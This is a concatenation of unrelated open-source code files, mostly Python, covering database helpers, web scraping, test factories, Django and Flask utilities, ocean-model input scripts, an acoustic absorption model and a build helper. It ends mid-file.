my.connect(host=host,user=username,password=password,database=database,charset='utf8')\n\t\tself.cur = self.conn.cursor()\n\t\t\n\tdef __execute(self,sql):\n\t\ttry:\n\t\t\tself.cur.execute(sql)\n\t\t\tself.conn.commit()\n\t\t\treturn True\n\t\texcept Exception as e:\n\t\t\tself.conn.rollback()\n\t\t\tprint(e)\n\t\t\treturn False\n\tdef select(self,sql):\n\t\ttry:\n\t\t\tself.cur.execute(sql)\n\t\t\ttitles = [name[0] for name in self.cur.description]\n\t\t\tdata = [titles]\n\t\t\tfor line in self.cur.fetchall():\n\t\t\t\tlineData = []\n\t\t\t\tfor value in line:\n\t\t\t\t\tlineData.append(value)\n\t\t\t\tdata.append(lineData)\n\t\t\treturn data\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\tdef sql(self,sql):\n\t\treturn self.__execute(sql)\n\tdef insertMany(self,sql,data):\n\t\tif self.type =='sqlite':\n\t\t\tsql = sql.replace('%s','?')\n\t\ttry:\n\t\t\tself.cur.executemany(sql,data)\n\t\t\tself.conn.commit()\n\t\t\treturn True\n\t\texcept Exception as e:\n\t\t\tself.conn.rollback()\n\t\t\tprint(e)\n\t\t\treturn False\n\tdef close(self):\n\t\tself.cur.close()\n\t\tself.conn.close()\n","sub_path":"tool/dbHelper.py","file_name":"dbHelper.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"370016959","text":"\"\"\"Barchart Model\"\"\"\n__docformat__ = \"numpy\"\n\nimport pandas as pd\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef get_options_info(ticker: str) -> pd.DataFrame:\n \"\"\"Scrape barchart for options info\n\n Parameters\n ----------\n ticker: str\n Stock ticker\n\n Returns\n -------\n df: pd.DataFrame\n Dataframe of information\n \"\"\"\n page = f\"https://www.barchart.com/stocks/quotes/{ticker}/overview\"\n\n r = requests.get(page, headers={\"User-Agent\": \"Mozilla/5.0\"})\n soup = BeautifulSoup(r.text, \"html.parser\")\n tags = soup.find(\n \"div\",\n attrs={\n \"class\": \"barchart-content-block symbol-fundamentals bc-cot-table-wrapper\"\n },\n 
)\n data = tags.find_all(\"li\")\n labels = []\n values = []\n for row in data:\n labels.append(row.find_all(\"span\")[0].getText())\n values.append(row.find_all(\"span\")[1].getText())\n\n df = pd.DataFrame(data=[labels, values]).T\n\n return df\n","sub_path":"gamestonk_terminal/options/barchart_model.py","file_name":"barchart_model.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"137267517","text":"# -*- coding: utf-8 -*-\nimport factory\nfrom factory.django import DjangoModelFactory\nfrom osf_tests.factories import UserFactory, ProjectFactory, ExternalAccountFactory\n\nfrom addons.nextcloud.models import UserSettings, NodeSettings\n\n\nclass NextcloudAccountFactory(ExternalAccountFactory):\n provider = 'nextcloud'\n provider_id = factory.Sequence(lambda n: 'id-{0}'.format(n))\n profile_url = factory.Sequence(lambda n: 'https://localhost/{0}/nextcloud'.format(n))\n oauth_secret = factory.Sequence(lambda n: 'https://localhost/{0}/nextcloud'.format(n))\n display_name = 'catname'\n oauth_key = 'meoword'\n\n\nclass NextcloudUserSettingsFactory(DjangoModelFactory):\n class Meta:\n model = UserSettings\n\n owner = factory.SubFactory(UserFactory)\n\n\nclass NextcloudNodeSettingsFactory(DjangoModelFactory):\n class Meta:\n model = NodeSettings\n\n owner = factory.SubFactory(ProjectFactory)\n user_settings = factory.SubFactory(NextcloudUserSettingsFactory)\n folder_id = '/Documents/'\n","sub_path":"addons/nextcloud/tests/factories.py","file_name":"factories.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"605321237","text":"#\n# for i in iter(int, 1):\n# print(\"dsdsd\")\n\n# s = [1,2,4,5,1,2,5]\n# c = [1,2,4,5,1,2,5]\n# z = len(s)\n# v = len(c)\n# if z == v:\n# for i in range(z) :\n# if s[i] != c[i]:\n# print(\"не равны\")\n# break\n# else:\n# print(\"не равны\")\n\nс = 
\"five thirteen two eleven seventeen two one thirteen ten four eight five nineteen\"\nc = с.split(\" \")\n\n# dic = {\"five\": 5, \"thirteen\": 13, \"two\": 2, \"eleven\": 11, 'seventeen': 17, 'one': 1,\n# \"ten\": 10, \"four\": 4,\"eight\":8, \"nineteen\": 19}\n\nf = []\nfor i in list(range(len(c))):\n f.append({\"five\": 5, \"thirteen\": 13, \"two\": 2, \"eleven\": 11, 'seventeen': 17, 'one': 1,\"ten\": 10, \"four\": 4,\"eight\":8, \"nineteen\": 19}[c[i]])\nprint(f)\n\nli = list(set(f))\nprint(li)\n\nfor i in range(len(li)):\n if i == int(len(li)-1): break\n if li[i] % 2 != 0: print(\"ggg\", li[i] + li[i + 1])\n if li[i] % 2 == 0: print(\"ggg\", li[i] * li[i + 1])\n\nsum = 0\nfor i in range(len(li)):\n if li[i] % 2 != 0:\n sum = sum + li[i]\n\nprint(\"Сумма нечетных\", sum)\n","sub_path":"Tasks/Putsilouski_Tasks/CW/6/claswork2.py","file_name":"claswork2.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"82142901","text":"import os\nimport os.path as osp\nimport re\n\n\nbase_path = 'papers/'\n\ndef atoi(text):\n return int(text) if text.isdigit() else text\n \ndef human_sort_keys(text):\n \"\"\"\n alist.sort(key=natural_keys) sorts in human order\n http://nedbatchelder.com/blog/200712/human_sorting.html\n (See Toothy's implementation in the comments)\n \"\"\"\n return [ atoi(c) for c in re.split('(\\d+)', text) ]\n\ndef pretty_print_areas(areas):\n for k in areas.keys():\n print(\"{0}\\t\\t{1}\".format(k, areas[k]))\n\nareas = {}\n\nfor root, dirs, files in os.walk(base_path):\n # Get all the subdirectories in the base_path as the different areas\n if root == base_path:\n for area in dirs:\n areas[area] = []\n\n if files:\n area = root.split('/')[-1]\n for file in files:\n areas[area].append(osp.join(root, file))\n \n# pretty_print_areas(areas)\n\nfor k in areas.keys():\n areas[k].sort(key=human_sort_keys)\n print(\"## \" + k.title())\n for p in areas[k]:\n with 
open(p) as f:\n title = f.readline()[3:].strip()\n paper_no = p.split('/')[-1][:-3]\n print(\"{2}. [{0}]({1})\".format(title, p, paper_no))\n \n print()\n","sub_path":"papers_list.py","file_name":"papers_list.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"520986320","text":"import logging\nimport os\nimport sys\nimport requests\nfrom keboola.docker import Config\nimport exdbm.extractor\nimport voluptuous as vp\n\nif __name__ == '__main__':\n try:\n datadir = os.environ['KBC_DATADIR']\n config = Config(datadir)\n params = config.get_parameters()\n if params.get('debug'):\n logging.basicConfig(level=logging.DEBUG, stream=sys.stdout)\n else:\n logging.basicConfig(level=logging.INFO, stream=sys.stdout)\n\n credentials = {\n 'client_id': config.get_oauthapi_appkey(),\n 'client_secret': config.get_oauthapi_appsecret(),\n 'refresh_token': config.get_oauthapi_data()['refresh_token']\n }\n exdbm.extractor.main(datadir, credentials, params)\n except (ValueError, KeyError, vp.MultipleInvalid):\n logging.error(err)\n sys.exit(1)\n except requests.HTTPError as err:\n logging.error(\"%s %s\", err, err.response.text)\n sys.exit(1)\n except:\n logging.exception(\"Internal error\")\n sys.exit(2)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"454874590","text":"# coding: utf-8\nfrom __future__ import absolute_import, print_function, unicode_literals\n\nimport json\n\nfrom django.conf import settings\nfrom django.contrib import auth\nfrom django.http import HttpResponse, HttpResponseNotAllowed\nfrom django.shortcuts import render, redirect\n# import requests\n\n# from .models import UserProfile\nfrom .auth import authenticate_dibbs\n\n\ndef _user_request_data(request):\n return HttpResponse(json.dumps({\n 'user': str(request.user),\n 
'is_anonymous': bool(request.user.is_anonymous()),\n 'is_active': bool(request.user.is_active),\n 'is_authenticated': bool(request.user.is_authenticated()),\n }, indent=4), content_type='application/json')\n\n\ndef login(request):\n if request.method == 'GET':\n return render(request, 'userproxy/login.html')\n elif request.method != 'POST':\n raise HttpResponseNotAllowed()\n\n auth.logout(request)\n user = authenticate_dibbs(\n username=request.POST['username'],\n password=request.POST['password'],\n )\n if user is not None:\n if user.is_active:\n auth.login(request, user)\n return redirect('home')\n\n return render(request, 'userproxy/login.html', context={\n 'error': 'Invalid credentials.',\n })\n\n\ndef logout(request):\n auth.logout(request)\n return HttpResponse('200 OK')\n\n\ndef home(request):\n return _user_request_data(request)\n","sub_path":"repos/backtofront/userproxy/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"3828978","text":"import xarray as xr\nimport numpy as np\nimport netCDF4\nfrom datetime import timedelta\n\nde = xr.open_dataset(\"/g/data/x77/ahg157/inputs/mom6/panan/vcoord.nc\")\ndi = xr.open_dataset(\n \"/data/panan/temp_salt_init_z_0025.nc\",\n chunks={\"depth\": 11, \"nyp\": 169, \"nxp\": 360}\n)\ndf = xr.open_dataset(\"/g/data/x77/ahg157/inputs/mom6/panan/forcing_obc_converted.nc\")\ndg = xr.open_dataset(\"/g/data/x77/ahg157/inputs/mom6//panan/ocean_hgrid_0025.nc\")\n\nvelocity_timescale = timedelta(days=1).total_seconds()\n\nc2d = (169, 360)\nc3d = (11, 169, 360)\n\nkwargs = {\n \"zlib\": True,\n \"chunksizes\": c3d,\n \"fill_value\": netCDF4.default_fillvals[\"f8\"],\n}\n\ndo = netCDF4.Dataset(\"/g/data/x77/ahg157/inputs/mom6/panan/sponge_idamp_velonly.nc\", \"w\")\ndo.createDimension(\"nxp\", 7200)\ndo.createDimension(\"nyp\", 1690)\ndo.createDimension(\"zl\", 75)\ndo.createDimension(\"zi\", 
76)\n\ndo.createVariable(\"Idamp\", \"f8\", (\"nyp\", \"nxp\"), zlib=True, chunksizes=c2d, fill_value=netCDF4.default_fillvals[\"f8\"])[:] = 0\ndo.variables[\"Idamp\"][:] = (1 / 3600) * (dg.y.isel(nyp=slice(1, None, 2), nxp=slice(1, None, 2)) > -38)\n\n# h = df.dz_u_segment_001.isel(time=0, ny_segment_001=0, nx_segment_001=slice(1, None, 2))\n# do.createVariable(\"uv_thickness\", \"f8\", (\"zl\", \"nyp\", \"nxp\"), **kwargs)\n# do.variables[\"uv_thickness\"][:] = h.values[:,None,:]\n\ndo.close()\n","sub_path":"scripts/generate_idamp_netcdf4.py","file_name":"generate_idamp_netcdf4.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"504211367","text":"# Copyright (c) Facebook, Inc. and its affiliates.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport unittest\n\nfrom thrift.py3lite.serializer import Protocol\nfrom thrift.py3lite.sync_client import ClientType, get_client\nfrom thrift.py3lite.test.lite_clients import TestService\nfrom thrift.py3lite.test.lite_types import ArithmeticException, EmptyException\nfrom thrift.py3lite.test.test_server import server_in_another_process\n\n\nclass SyncClientTests(unittest.TestCase):\n def test_basic(self) -> None:\n with server_in_another_process() as path:\n with get_client(TestService, path=path) as client:\n self.assertEqual(3, client.add(1, 2))\n\n def test_client_type_and_protocol(self) -> None:\n with 
server_in_another_process() as path:\n with get_client(\n TestService,\n path=path,\n client_type=ClientType.THRIFT_ROCKET_CLIENT_TYPE,\n protocol=Protocol.BINARY,\n ) as client:\n sum = client.add(1, 2)\n self.assertEqual(3, sum)\n\n def test_void_return(self) -> None:\n with server_in_another_process() as path:\n with get_client(TestService, path=path) as client:\n self.assertIsNone(client.noop())\n\n def test_exception(self) -> None:\n with server_in_another_process() as path:\n with get_client(TestService, path=path) as client:\n self.assertAlmostEqual(2, client.divide(6, 3))\n with self.assertRaises(ArithmeticException):\n client.divide(1, 0)\n\n def test_void_return_with_exception(self) -> None:\n with server_in_another_process() as path:\n with get_client(TestService, path=path) as client:\n with self.assertRaises(EmptyException):\n client.oops()\n\n def test_oneway(self) -> None:\n with server_in_another_process() as path:\n with get_client(TestService, path=path) as client:\n self.assertIsNone(client.oneway())\n","sub_path":"thrift/lib/py3lite/client/test/sync_client_test.py","file_name":"sync_client_test.py","file_ext":"py","file_size_in_byte":2555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"476272485","text":"import spisok_stud, quashion\n# Начало работы\n# Вызываем все функции из модулей spisok_stud, quashion для прохождения теста\ndef callback():\n stud = spisok_stud.reg()\n avtoriz = spisok_stud.log()\n test = quashion.test_matematik()\n ser = quashion.serialize()\n sav = quashion.user_json_dumps()\n return sav\n# Вывод данных в файл c использованием json.loads и добавления к этим данным фамилии и имени студента\nimport json\ndef test_stud_for_arhiv():\n c = str(input(\"Введите свою Фамилию: \"))\n i = str(input(\"Введите свое Имя: \"))\n list_stud = [c, i]\n total_data = {\"Данные тестируемого\": list_stud}\n fil = str(input(\"Введите с клавиатуры имя файла , откуда нужно взять данные теста 
студента \"))\n data_stud = {}\n with open(fil, \"r\") as f:\n json_loads_d = f.read()\n data_stud = json.loads(json_loads_d)\n data_stud.update(total_data)\n print(type(data_stud))\n print(data_stud)\n return data_stud\nf = test_stud_for_arhiv()\n# Функция сохранения данных в формате json в файл 'архив'\ndef user_json_dumps(f):\n json_dumps_user = json.dumps(f)\n with open('архив', 'a') as f:\n f.write(json_dumps_user)\n print(json_dumps_user)\nuser_json_dumps(f)\n# Функция сериализации данных словаря в строку для удобного просмотра на экране\ndef serialize(f):\n res = \"Данные тестируемого: {}\\n\"\\\n \"Вопрос 2x2=?' : {}\\n\"\\\n \"Вопрос 3x3=? : {}\\n\" \\\n \"Вопрос 23-15=? : {}\\n\" \\\n \"Вопрос sin(180)=?: {}\\n\" \\\n \"Вопрос 120:5=? : {}\\n\"\\\n \"Вопрос 45x4=? : {}\\n\"\\\n \"Вопрос cos(90)=? : {}\\n\"\\\n \"Общее количество баллов: {}\".format(f[\"Данные тестируемого\"],\n f[\"Вопрос 2x2=?\"],\n f[\"Вопрос 3x3=?\"],\n f[\"Вопрос 23-15=?\"],\n f[\"Вопрос sin(180)=?\"],\n f[\"Вопрос 120:5=?\"],\n f[\"Вопрос 45x4=?\"],\n f[\"Вопрос cos(90)=?\"],\n f[\"Общее количество баллов\"])\n return res\nser_stud = serialize(f)\nprint(ser_stud)\n\n","sub_path":"res_test.py","file_name":"res_test.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"41657878","text":"from app import create_app, db\nfrom flask_script import Manager, Server\nfrom flask_migrate import Migrate, MigrateCommand\nfrom app.models import User\n#import migrations ,set up migrations\n\n#Creating an app instance\napp = create_app('development')\n\n#Creating the manager instance\nmanager = Manager(app)\n\n#create migration instance below\nmanager.add_command('server', Server)\nmigrate = Migrate(app, db)\nmanager.add_command('db',MigrateCommand)\n\n@manager.command\ndef test():\n '''\n to run the unit tests\n '''\n import unittest\n tests = unittest.TestLoader().discover('tests')\n 
unittest.TextTestRunner(verbosity=2).run(tests)\n\n\n@manager.shell\ndef make_shell_context():\n return dict(app = app, db = db, User = User)\nif __name__ == '__main__':\n manager.run()\n\n","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"151021122","text":"\nfrom BMM.metadata import TC, Ring\n\nrun_report(__file__, text='miscellaneous metadata and the baseline')\n\nfirst_crystal = TC('XF:06BMA-OP{Mono:DCM-Crys:1}', name='first_crystal')\ncompton_shield = TC('XF:06BMA-OP{Mono:DCM-Crys:1-Ax:R}', name='compton_shield')\n\nring = Ring('SR', name='ring')\n\nsd.baseline = (xafs_linx, xafs_liny, xafs_pitch, xafs_wheel, xafs_ref, #xafs_roll, xafs_linxs, xafs_roth, xafs_rots,\n dm3_bct, dm3_foils, dm2_fs,\n dcm_x, dcm_pitch, dcm_roll,\n slits3.top, slits3.bottom, slits3.outboard, slits3.inboard, slits3.vsize, slits3.vcenter, slits3.hsize, slits3.hcenter, \n slits2.top, slits2.bottom, slits2.outboard, slits2.inboard, slits2.vsize, slits2.vcenter, slits2.hsize, slits2.hcenter,\n #m1.yu, m1.ydo, m1.ydi, m1.xu, m1.xd, m1.vertical, m1.lateral, m1.pitch, m1.roll, m1.yaw,\n m2.yu, m2.ydo, m2.ydi, m2.xu, m2.xd, m2.vertical, m2.lateral, m2.pitch, m2.roll, m2.yaw, m2_bender,\n m3.yu, m3.ydo, m3.ydi, m3.xu, m3.xd, m3.vertical, m3.lateral, m3.pitch, m3.roll, m3.yaw,\n xafs_table.yu, xafs_table.ydo, xafs_table.ydi, xafs_xu , xafs_xd,\n xafs_table.vertical, xafs_table.pitch, xafs_table.roll, \n)\n\n#sd.baseline = ()\n","sub_path":"startup/16-metadata.py","file_name":"16-metadata.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"222501393","text":"from root.db import Database\nfrom .models import MovieModel\nfrom .movies_queries import *\n\n\nclass MovieGateway:\n def __init__(self):\n self.model = MovieModel\n self.db = Database()\n\n def 
add_movie(self, title, rating):\n self.db.create_connection()\n self.db.connect_cursor()\n\n query = '''\n INSERT INTO movies (title, rating)\n VALUES (?, ?);\n '''\n self.db.cursor.execute(query, (title, rating,))\n self.db.connection.commit()\n self.db.connection.close()\n\n self.db.create_connection()\n self.db.connect_cursor()\n get_movie_by_id_query = '''\n SELECT id\n FROM movies\n WHERE title = ? and rating = ?;'''\n\n self.db.cursor.execute(get_movie_by_id_query, (title, rating,))\n movie_id = self.db.cursor.fetchone()[0]\n\n self.db.connection.commit()\n self.db.connection.close()\n return self.model(movie_id=movie_id, title=title, rating=rating)\n\n def show_movies(self):\n self.db.create_connection()\n self.db.connect_cursor()\n\n self.db.cursor.execute(select_all_movies_and_order_by_rating)\n raw_movies = self.db.cursor.fetchall()\n\n self.db.connection.commit()\n self.db.connection.close()\n all_movies = []\n\n for movie in raw_movies:\n new_movie = self.model(movie_id=movie[0], title=movie[1], rating=movie[2])\n all_movies.append(new_movie)\n\n return raw_movies\n","sub_path":"root/movies/movies_gateway.py","file_name":"movies_gateway.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"340662238","text":"\"\"\"\nAuthor: Michael Markus Ackermann\n================================\nHere you will find everything related to the biot-allard model.\n\"\"\"\n\nimport numpy as np\nfrom scipy import special as ss\n\nformats = {\"circle\": 1,\n \"square\": 1.07,\n \"equi-tri\": 1.11,\n \"retang\": 0.81}\n\n\ndef shear_wave(omega, flow_resis, poros, tortu, shape, air_dens):\n \"\"\"\n Returns the Shear Wave number.\n\n Parameters:\n ----------\n omega: int | float | complex\n Angular frequency\n flow_ resis: int\n Resistivity of the material\n poros: float\n Porosity of the material\n tortu: float\n Tortuosity of the material\n shape: string\n Form factor for simple 
pores\n air_dens: int | float\n The air density\n\n Returns:\n --------\n s: int | float\n Shear wave number\n\n \"\"\"\n c1 = formats[shape]\n num = 8 * omega * air_dens * tortu\n den = flow_resis * poros\n s = c1 * (num / den) ** 0.5\n\n return s\n\n\ndef biot_allard(flow_resis, air_dens, poros, tortu, gama, prandtl,\n atm, shape, freq=np.arange(100, 10001, 1)):\n \"\"\"\n Returns through the Biot-Allard Model the Material Charactheristic\n Impedance and the Material Wave Number.\n\n Parameters:\n ----------\n flow_resis : int\n Resistivity of the material\n air_dens : int | float\n The air density\n poros : float\n Porosity of the material\n tortu: float\n Tortuosity of the material\n gama: int | float\n Ratio of specific heat\n prandtl: int | float\n Prandtl's number\n atm: int\n Atmospheric pressure\n shape: string\n Form factor for simple pores\n freq : ndarray\n A range of frequencies\n NOTE: default range goes from 100 [Hz] to 10 [kHz].\n\n Returns:\n -------\n zc : int | float | complex\n Material Charactheristic Impedance\n kc : int | float | complex\n Material Wave Number\n \"\"\"\n omega = 2 * np.pi * freq\n B = prandtl ** 0.5\n s = shear_wave(omega, flow_resis, poros, tortu, shape, air_dens)\n\n rho_part_a = air_dens * tortu\n rho_part_b = (flow_resis * poros) / (1j * omega * air_dens * tortu)\n rho_part_c = (s * (-1j) ** 0.5) / 4\n rho_part_d = 2 / (s * (-1j) ** 0.5)\n rho_part_e = ss.jv(1, s * (-1j) ** 0.5) / ss.jv(0, s * (-1j) ** 0.5)\n\n rho_ef = rho_part_a * (1 - rho_part_b * ((rho_part_c * rho_part_e) /\n (1 - rho_part_d * rho_part_e)))\n\n k_part_a = rho_part_b / B\n k_part_b = rho_part_c * B\n k_part_c = rho_part_d / B\n k_part_d = ss.jv(1, s * B * (-1j) ** 0.5) / ss.jv(0, s * B * (-1j) ** 0.5)\n\n k_ef = (gama * atm) / (gama - (gama - 1) /\n (1 - k_part_a * ((k_part_b * k_part_d) /\n (1 - k_part_c * k_part_d))))\n\n # Changing from efficient to equivalent\n rho_eq = rho_ef / poros\n k_eq = k_ef / poros\n\n # Charactheristic Impedance (zc) and 
the Wave Number (kc)\n zc = (k_eq * rho_eq) ** 0.5\n kc = omega * (rho_eq / k_eq) ** 0.5\n\n return zc, kc\n","sub_path":"pyabsorp/models/biot_allard.py","file_name":"biot_allard.py","file_ext":"py","file_size_in_byte":3392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"397272900","text":"from __future__ import generators\nfrom __future__ import print_function\nimport abc\nimport os\nimport sys\nimport fileinput\n\n# imports of NCAR scripts\nlib_path = os.path.join('scripts/python/contrib/unit_testing')\nsys.path.append(lib_path)\nimport environment as lmod\nimport subprocess\nimport shutil\n\nclass platformBuilder(object):\n __metaclass__ = abc.ABCMeta\n \"\"\" class to extend for building on various platforms. implements\n interfaces and a factory pattern. creates a relevant platform\n class (darwin_gnu, yellowstone_intel, goldbach_nag, etc...\n that configures cmake, builds pio and tests, and runs the unit\n tests.\n \"\"\"\n\n def __init__(self, compiler,test,mpilib,debug):\n \"\"\" user defined ctor so we can put stuff in a class instead of as\n class attributes. 
Override this in platform specific classes\n \"\"\"\n self.test = test\n self.CMAKE_EXE = ''\n if mpilib == 'mpi-serial':\n self.CC = 'cc'\n self.FC = 'f90'\n self.CXX=''\n else:\n self.FC = 'mpif90'\n self.CC = 'mpicc'\n self.CXX = 'mpiCC'\n\n self.LDFLAGS=''\n\n if debug is True:\n bldtype = \"PIO_DEBUG\"\n else:\n bldtype = \"PIO\"\n\n\n self.OFLAGS = ('-D CMAKE_BUILD_TYPE:STRING={0} '\n '-D PIO_BUILD_TESTS:LOGICAL=TRUE '\n '-D PIO_BUILD_TIMING:LOGICAL=TRUE '.format(bldtype))\n self.MPIEXEC = ''\n self.EXECCA = ''\n self.TEST_CMD = 'ctest '\n self.MAKE_CMD = 'make all'\n self.envMod = dict(os.environ)\n @classmethod\n def _raise_not_implemented(cls, method_name):\n raise NotImplementedError(cls.__name__ +\n \" does not implement method \" +\n method_name+\".\")\n\n @abc.abstractmethod\n def runModuleCmd(self, modname):\n \"\"\"Method not implemented.\"\"\"\n self._raise_not_implemented(\"runModuleCmd\")\n\n def metaBuild(self):\n \"\"\" routine where everything gets kicked off from\n \"\"\"\n shutil.rmtree(self.BUILD_DIR, True)\n\n self.runModuleCmd()\n # ~# change environment, first get existing env\n\n # ~# add to env- \n self.envMod['FC'] = self.FC\n self.envMod['CC'] = self.CC\n if not self.CXX == '':\n self.envMod['CXX'] = self.CXX\n if not self.LDFLAGS == '':\n self.envMod['LDFLAGS'] = self.LDFLAGS\n\n self.cmakeCmd()\n self.buildCmd()\n if self.test:\n self.testCmd()\n\n def buildCmd(self):\n \"\"\" run build\n \"\"\"\n p = subprocess.Popen(self.MAKE_CMD,shell=True,env=self.envMod)\n p.wait()\n\n def testCmd(self):\n \"\"\" run tests\n \"\"\"\n p = subprocess.Popen(self.TEST_CMD, shell=True, env=self.envMod)\n p.wait()\n\n def cmakeCmd(self):\n \"\"\" cmake command to run\n \"\"\"\n # ~# make build directory and move to it.\n if not os.path.exists(self.BUILD_DIR):\n os.makedirs(self.BUILD_DIR)\n\n os.chdir(self.BUILD_DIR)\n\n cmakeString = (self.CMAKE_EXE +' '+ self.OFLAGS + ' '+ self.EXECCA + ' '+self.MPIEXEC + ' ..')\n\n p = 
subprocess.Popen(cmakeString,\n shell=True, env=self.envMod)\n p.wait()\n\n @staticmethod\n def factory(platform,compiler,test,mpilib,debug):\n \"\"\" factory method for instantiating the appropriate class\n \"\"\"\n\n if platform == \"darwin\":\n return darwin(compiler,test,mpilib,debug)\n if platform == \"goldbach\":\n return goldbach(compiler,test,mpilib,debug)\n if platform == \"yellowstone\":\n return yellowstone(compiler,test,mpilib,debug)\n if platform == \"caldera\":\n return caldera(compiler,test,mpilib,debug)\n if platform == \"mira\":\n return cetus(compiler,test,mpilib,debug)\n if platform == \"cetus\":\n return cetus(compiler,test,mpilib,debug)\n# return platformBuilder(compiler)\n\n\n\"\"\" these subclasses should probably be in their own files.\n each platform then needs one class to extend testCmd and\n runModuleCmd. That in turn should be extended only for __init__\n for each compiler...all to reduce duplicated code.\n\"\"\"\n \nclass darwin(platformBuilder):\n\n def __init__(self, compiler, test,mpilib,debug):\n \"\"\" user defined ctor so we can put stuff in a class instead of as\n class attributes\n \"\"\"\n super(darwin,self).__init__(compiler, test,mpilib,debug)\n \n self.CMAKE_EXE = '/opt/local/bin/cmake'\n self.OFLAGS += ('-D PLATFORM:STRING=darwin ')\n if mpi is True:\n self.MPIEXEC = ('-D MPIEXEC:FILEPATH='\n '/opt/local/bin/mpiexec-mpich-gcc48 ')\n self.EXECCA = ''\n \n def runModuleCmd(self):\n \"\"\" implement ABC...give pass in this case...run module cmds\n \"\"\"\n # ~# not implemented for a system without lmod (or\n # ~# somthing similar)\n pass\n\nclass elm(darwin):\n\n def __init__(self, compiler, test,mpilib,debug):\n \"\"\" user defined ctor so we can put stuff in a class instead of as\n class attributes\n \"\"\"\n super(elm,self).__init__(compiler, test,mpilib,debug)\n\nclass cray(platformBuilder):\n def __init__(self, compiler, test,mpilib,debug):\n \"\"\" user defined ctor so we can put stuff in a class instead of as\n class 
attributes\n \"\"\"\n \n super(cray, self).__init__(compiler, test,mpilib, debug)\n \n self.BUILD_DIR = \"build_cray_\" + compiler\n self.OFLAGS += ( '-D CMAKE_SYSTEM_NAME:STRING=Catamount ')\n\n\nclass bluewaters(cray):\n\n def __init__(self, compiler, test,mpilib,debug):\n \"\"\" user defined ctor so we can put stuff in a class instead of as\n class attributes\n \"\"\"\n super(bluewaters,self).__init__(compiler, test,mpilib,debug)\n if compiler == 'cray': \n self.moduleList = ['PrgEnv-cray/5.2.40','cce/8.3.8']\n if compiler == 'pgi':\n self.moduleList = ['PrgEnv-pgi/5.2.40','pgi/14.2.0']\n self.moduleList += ['cray-netcdf-hdf5parallel/4.3.2',\n 'cmake']\n\n\nclass goldbach(platformBuilder):\n \n def __init__(self, compiler, test,mpilib,debug):\n \"\"\" user defined ctor so we can put stuff in a class instead of as\n class attributes\n \"\"\"\n \n super(goldbach, self).__init__(compiler, test,mpilib, debug)\n if compiler == 'nag':\n self.moduleList = ['compiler/nag/5.3.1-907']\n if compiler == 'intel':\n self.moduleList = ['compiler/intel/14.0.2']\n\n self.BUILD_DIR = \"build_goldbach_\" + compiler\n self.runModuleCmd()\n \n self.CMAKE_EXE = '/usr/bin/cmake '\n \n self.OFLAGS += ( '-D PLATFORM:STRING=goldbach ')\n if mpilib is not \"mpi-serial\":\n self.MPIEXEC = ('mpirun ')\n self.EXECCA = ''\n self.LDFLAGS = '-lcurl'\n os.environ[\"MODULESHOME\"] = \"/usr/share/Modules\"\n os.environ[\"MODULEPATH\"]=\"/usr/share/Modules/modulefiles:/etc/modulefiles\"\n def runModuleCmd(self):\n \"\"\" implement ABC...run module cmds\n \"\"\"\n # ~# not implemented for a system without lmod (or\n # ~# somthing similar)\n self.lmod = lmod.ModuleInterface()\n self.lmod.python_init(\"/usr/share/Modules/init/python.py\")\n\n self.lmod.purge()\n\n for cmd in self.moduleList:\n self.lmod.load(cmd)\n self.lmod.list()\n \nclass yellowstone(platformBuilder):\n\n def __init__(self, compiler, test, mpilib, debug):\n \"\"\" user defined ctor so we can put stuff in a class instead of as\n 
